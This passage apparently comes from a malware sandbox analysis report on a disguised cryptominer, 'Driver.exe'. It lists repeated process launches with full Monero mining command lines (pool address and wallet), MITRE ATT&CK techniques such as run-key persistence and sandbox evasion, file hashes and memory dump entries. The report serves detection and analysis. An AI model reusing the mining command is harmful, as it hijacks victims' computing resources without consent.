  PID:2212
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2060
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2124
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1412
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1252
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2032
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2512
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2764
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2680
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:580
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1772
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:444
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2836
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2040
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1992
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2976
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2288
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2364
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2208
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1108
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1524
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1916
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2872
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2492
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2880
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2416
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2172
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:892
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1760
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1876
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1432
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2496
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:688
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1596
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2116
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:904
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2464
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2300
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1364
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1672
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2372
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1256
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2880
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1208
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1692
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1596
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1236
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1508
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2324
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2124
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2760
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2488
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2152
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1580
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:3004
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:1196
- C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 48AoW6ZkJwHaschLzriiTXYMYsG9gGxQR9gTWpEQSZALMf7fjwBYvxnCQ12EhhuJ1PDv6Z7ZsT4wnYdXqLPT8STQHmk8chR -p x -k -v=0 --donate-level=1 -t 4
  2⤵
  PID:2652

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-266993909-1191781124-7620630841545995117-14250392001558772467-1409408792-842362210"
1⤵
PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/308-91-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/340-178-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/848-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1052-37-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1360-86-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1372-31-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1372-3-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1372-10-0x0000000001280000-0x0000000001F16000-memory.dmp

Filesize
12.6MB

Download
memory/1372-18-0x0000000007B50000-0x00000000086C5000-memory.dmp

Filesize
11.5MB

Download
memory/1372-0-0x0000000001280000-0x0000000001F16000-memory.dmp

Filesize
12.6MB

Download
memory/1372-1-0x00000000750EE000-0x00000000750EF000-memory.dmp

Filesize
4KB

Download
memory/1372-9-0x0000000001280000-0x0000000001F16000-memory.dmp

Filesize
12.6MB

Download
memory/1372-26-0x0000000001280000-0x0000000001F16000-memory.dmp

Filesize
12.6MB

Download
memory/1372-27-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1372-2-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1372-61-0x0000000007B50000-0x00000000086C5000-memory.dmp

Filesize
11.5MB

Download
memory/1372-8-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1372-12-0x00000000750E0000-0x0000000075127000-memory.dmp

Filesize
284KB

Download
memory/1512-43-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1652-168-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1720-127-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1856-188-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1872-122-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1876-66-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1928-183-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2008-152-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2120-163-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2140-54-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2172-106-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2196-71-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2244-173-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2364-132-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2440-76-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2456-157-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2468-101-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2516-137-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2540-81-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2556-117-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2636-96-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2688-142-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2688-112-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2740-30-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2792-147-0x0000000140000000-0x0000000140B75000-memory.dmp

